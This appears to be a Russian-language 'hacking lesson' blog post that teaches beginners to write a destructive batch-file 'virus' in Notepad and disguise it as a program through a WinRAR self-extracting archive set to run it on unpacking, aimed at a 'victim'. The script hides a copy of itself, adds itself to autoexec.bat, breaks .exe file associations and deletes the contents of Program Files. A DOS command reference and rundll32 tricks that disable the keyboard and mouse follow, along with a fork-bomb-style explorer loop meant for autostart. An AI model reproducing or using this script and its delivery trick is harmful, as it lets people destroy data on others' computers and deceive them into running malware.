*ХЕКЕРСТВО* урок 16 Создаём вирус с помощью блокнота и WinRar’а(долго писал:D)
Создаём вирус с помощью блокнота и WinRar'а 17:03
Сейчас я расскажу, как без знания программирования написать свой вирус с расширением. bat. Статья предоставлена для начинающих. И вот еще что: статья написана в ознакомительных целях, и за использование нижеизложенной информации в целях нанесения вреда я не несу никакой ответственности. При написания вируса я использовал обыкновенный блокнот.
Итак начнем , каждую новую строчку я буду пояснять.
@Echo off (запрещаем вывод на экран исполняемых команд)
Echo Virus Loading (Выводит на экран надпись "Virus Loading" В место нее можете писать что угодно)
Date 13.09.96 (эта строка изменяет дату)
If exist c:ski. bat goto abc (проверяет существует ли файл, .....)
Copy %0 c:ski. bat (копирует вирус только изменив названия)
Attrib +h c:ski. bat ( делает файлу ski. bat атрибут скрытый
Echo c:ski. bat >>autoexec. bat (Прописывает файл ski. bat в автозагрузку
:abc ( ......если он существует, то программа перейдет на метку :abc)
Md PRIDUROK
Md LUZER
Md DURAK (Создает пустые папки)
Md LAMER
Label E: PRIDUROK (CD-ROM будет называться PRIDUROK)
Assoc. exe=.mp3 (запускает все ексшники как музыка
Del c:Program Files/q (удаляет все файлы из этой папки)
Echo VIRUS LOAD (Выводит надпись)
Итак мы написали простой вирус. Теперь нажимаем ФАЙЛ>>СОХРАНИТЬ КАК, и в поле имя файла пишем, например virus. bat
.bat обязательна везде. Появился значок MS-DOS. Так что бы жертва не смогла увидеть его код будем использовать WIinRar. Берем наш вирусочек и кидаем его в архив вылетит окно и ты просто ставишь галочку "создать SFX-архив. Далее заходим в дополнительное и открываем параметры SFX там есть строка выполнить после распаковки и ты пишешь РЕАЛЬНОЕ имя твоего вируса. Видишь простой блокнот вступил как вирусосаздатель, а WinRar сделал якобы программу....выводы делать тебе. И смотри непопадись сам на это. Не принимай файлы в инете от незнакомых людей и смотри на размер файла.
Reg - непосредственная работа с реестром. Смотреть reg /? всем!
Rcp - обмен файлами через rcp в ascii
Runas - от имени пользователя
Tasklist - отображает приложения и сеансы, связанные с ним.
Taskkill - позволяет завершить один или несколько процессов
Tftp - trivial ftp
Tskill - убить процесс
Reg - утилита взаимодействия с реестром
Bootcfg - настройка boot. ini
Append - позволяет открывать удаленные файлы так, словно они находятся в текущем.
Getmac - получить мас
Logoff - Заверщить пользовательский сеанс.
Mem - вывод на экран сведений о текущих процессах в ОЗУ
Mqbkup - архивирование
Netsh - ??
Openfiles - просмотреть открытые файлы.
Rsh - выполнение команд на удаленных узлах с запущеной rsh
Sc - command line??
Rexec - выполнение команд на удаленных узлах с запущеной rexec
Shutdown - выключить (хе-хе) local or remote computer.
Systeminfo - вывод инфы о компе.
Schtasks - планировщик заданий.
Xcopy - копирование файлов и каталогов.
Tsshutdn - завершение работы сервера в установленом порядке.
Set - вывод, задание и удаление переменных среды cmd. exe. Свойства системы (пр. кн."мой комп") - дополнительно - Переменные среды. Там не все переменные, но много! Все смотреть просто set.
Кстати, вот некоторые RunDLL команды, которые могут использоваться при создании батников
Rundll32 user, wnetdisconnectdialog
Окно "Отключение сетевого диска" Вызвать
Rundll32 user, disableoemlayer
Сбой пpовоциpовать
Rundll32 user, repaintscreen
Обновить (как )
Rundll32 user, setcursorpos
Maus-Cursor слева ввеpх посадить
Rundll32 diskcopy, DiskCopyRunDll
Окно "Copy Disk" вызвать
Rundll32 rnaui. dll, RnaWizard /1
Диалог "Установка Связи" вызвать (/1 = без окна)
Rundll32 shell, shellexecute
Explorer-Окно откpыть в коpневом каталоге
Rundll32 shell32,OpenAs_RunDLL
Окно "Откpыть с помощью..." вызвать
Rundll32 shell32,SHFormatDrive
Окно "Фоpматиpование: Диск3,5(А)" вызвать
Rundll32 shell32,ShellAboutA
Info-Box (о Windows) вызвать
Rundll32 shell32,SHExitWindowsEx 0
Windows 98 заново стаpтанyть (без autoexec. bat и дp.)
Rundll32 shell32,SHExitWindowsEx 1
Работy с Windows 98 закончить
Rundll32 shell32,SHExitWindowsEx 2
Windows-98-PC boot
Rundll32 shell32,SHExitWindowsEx -1
Windows-98-Explorer стаpтанyть заново
Rundll32 shell32,Control_RunDLL
Откpыть окно "Панель yпpавления"
Rundll32 shell32,Control_RunDLL desk. cpl
Откpыть "Свойства Экpана"
Rundll32 shell32,Control_RunDLL main. cpl
Откpыть Modul-Панели yпpавления из MAIN. CPL
Rundll32 krnl386.exe, exitkernel
Выход из Windows без любых сообщений/вопpосов
Rundll32 user, swapmousebutton
"Пеpеставить" клавиши мыши
Rundll32 keyboard, disable
"Отключить" клавиатypy
Rundll32 mouse, disable
"Отключить" мышь
Rundll rnaui. dll, RnaDial "пpовайдеp"
Вызвать окно "Установка связи" с именем "пpовайдеp"
Rundll32 user, tilechildwindows
Выстpоить все не свёpнyтые окна свеpхy вниз
Rundll32 user, cascadechildwindows
Выстpоить все не свёpнyтые окна каскадом
Rundll32 sysdm. cpl, InstallDevice_Rundll
(единств. возможность в W98) yстановить non-Plug&Play обоpyдование
Rundll32 msprint2.dll, RUNDLL_PrintTestPage
Выбpать в появившемся меню пpинтеp и послать а него тест
Rundll32 user, setcaretblinktime
Yстановить новyю частотy мигания кypсоpа
Rundll32 user, setdoubleclicktime
Yстановить новyю скоpость двойного нажатия
Rundll32 setupx. dll, InstallHinfSection
DefaultInstall 130; C:file. inf
Окно "Пеpезапyск системы. Пpоизвести её сейчас? ъ Да/нет ъ"
ASSOC - Отображает или модифицирует связи расширений файлов
AT - Планирует команды и программы для выполнения на компьютере.
ATTRIB - Отображает или изменяет атрибуты файла.
BREAK - Устанавливает или отменяет проверку комбинации [Ctrl+C].
CACLS - Отображает или модифицирует списки управления доступом (ACLs) для файлов.
CALL - Вызывает один .BAT-файл из другого.
CD - Отображает имя или изменяет имя текущей директории.
CHCP - Отображает или устанавливает номер активной кодовой страницы.
CHDIR - Отображает имя или изменяет имя текущей директории.
CHKDSK - Проверяет диск и отображает отчет о состоянии.
CLS - Очищает экран.
CMD - Стартует новый экземпляр интерпретатора команд Windows NT.
COLOR - Устанавливает цвета по умолчанию для переднего и заднего плана консоли.
COMMAND - Стартует новую копию интерпретатора команд Windows.
COMP - Сравнивает содержимое двух файлов или установки файлов.
COMPACT - Отображает или видоизменяет сжатие файлов на патрициях Windows NT(NTFS).
CONVERT - Конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск.
COPY - Копирует один или больше файлов на другое место.
CTTY - Изменяет терминальное устройство, используемое для управления вашей системой.
DATE - Отображает или устанавливает дату.
DEL - Удаляет один или более файлов.
DEBUG - Выполняет отладку, тестирование программ и редактирование инструментальных средств.
DIR - Отображает список файлов и поддиректорий в директории.
DISKCOMP - Сравнивает содержимое двух дискет.
DISKCOPY - Копирует содержимое одной дискеты на другую.
DOSKEY - Редактирует командные строки, восстанавливает команды Windows и создает макрос.
ECHO - Отображает сообщения, или включает/выключает вывод команд.
EMM386 - Включает/выключает поддержку расширенной памяти EMM386.
ENDLOCAL - Заканчивает локализацию изменений окружающей среды в .BAT-файле.
ERASE - Удаляет один или более файлов.
EXIT - Прекращает выполнение программы (интерпретатор команд).
EXTRACT - Средство извлечения информации из CAB - файлов.
FC - Сравнивает два файла или установки файлов, и отображает различие между ними.
FIND - Ищет текстовую строку в файле или файлах.
FINDSTR - Поиск строк в файлах.
FOR - Выполняет указанную команду для каждого файла в наборе файлов.
FORMAT - Форматирует диск для использования с Windows.
FTYPE - Отображает или модифицирует типы файлов, используемых в связях расширений.
GOTO - Направляет интерпретатор команд Windows NT к помеченной строке в .BAT-файле.
GRAFTABL - Способность Windows отображать символы псевдографики, вставленные в графическом режиме.
HELP - Обеспечивает информацию Help для команд Windows.
IF - Выполняет обработку условия в .BAT-файле.
KEYB - Конфигурирует клавиатуру для заданного языка.
LABEL - Создает, изменяет, или удаляет метку тома на диске.
LOADHIGH(LH) - Загружает программу в верхние адреса памяти.
MD - Создает директорию.
MEM - Отображает величину используемой и свободной памяти в вашей системе.
MKDIR - Создает директорию.
MODE - Конфигурирует системное устройство.
MORE - Отображает вывод одного экрана за раз.
MOVE - Перемещает один или более файлов из одной директории в другую на том же диске.
NETSTAT - Отображает статистики протоколов и текущих сетевых соединений TCP/IP.
NLSFUNC - Загружает информацию, специфическую для страны.
PATH - Отображает или устанавливает путь поиска для выполняемых файлов.
PAUSE - Приостанавливает обработку .BAT-файла и отображает сообщение.
POPD - Восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD.
PRINT - Печатает текстовый файл.
PROMPT - Изменяет подсказку к командам Windows.
PUSHD - Сохраняет текущую директорию, потом изменяет.
RD - Удаляет директорию.
RECOVER - Восстанавливает читаемую информацию с плохого или дефектного диска.
REM - Записывает комментарии (примечания) в .BAT-файлы или CONFIG. SYS.
REN - Переименует файл или файлы.
RENAME - Переименует файл или файлы.
REPLACE - Заменяет файлы.
RESTORE - Восстанавливает файлы, которые были архивированы с использованием команды BACKUP.
RMDIR - Удаляет директорию.
SET - Отображает, устанавливает или удаляет переменные среды Windows.
SETLOCAL - Начинает локализацию изменений среды в .BAT-файле.
SETVER - Устанавливает номер версии MS-DOS, который Windows сообщает программе.
SHIFT - Сдвигает позицию замещаемых параметров в .BAT-файле.
SMARTDRV - Инсталлирует и конфигурирует утилиту кэширования диска SMART - драйва.
SORT - Сортирует входной поток.
START - Стартует отдельное окно для выполнения указанной программы или команды.
SUBST - Связывает путь с литерой диска.
SYS - Копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск.
TIME - Отображает или устанавливает системное время.
TITLE - Устанавливает заголовок окна для сеанса.
TREE - Графически отображает структуру директория в драйве или путь.
TYPE - Отображает содержимое текстового файла.
VER - Отображает версию Windows.
VERIFY - Сообщает Windows, проверять ли правильность записи файлов на диск.
VOL - Отображает метку дискового тома и серийный номер.
XCOPY - Копирует файлы и деревья директории.
Ну а если хочешь "убить" Windows то:
@echo off
Start explorer
Start explorer
Start explorer
Start explorer - повторить ещё раз 100 и прописать в автозагрузку.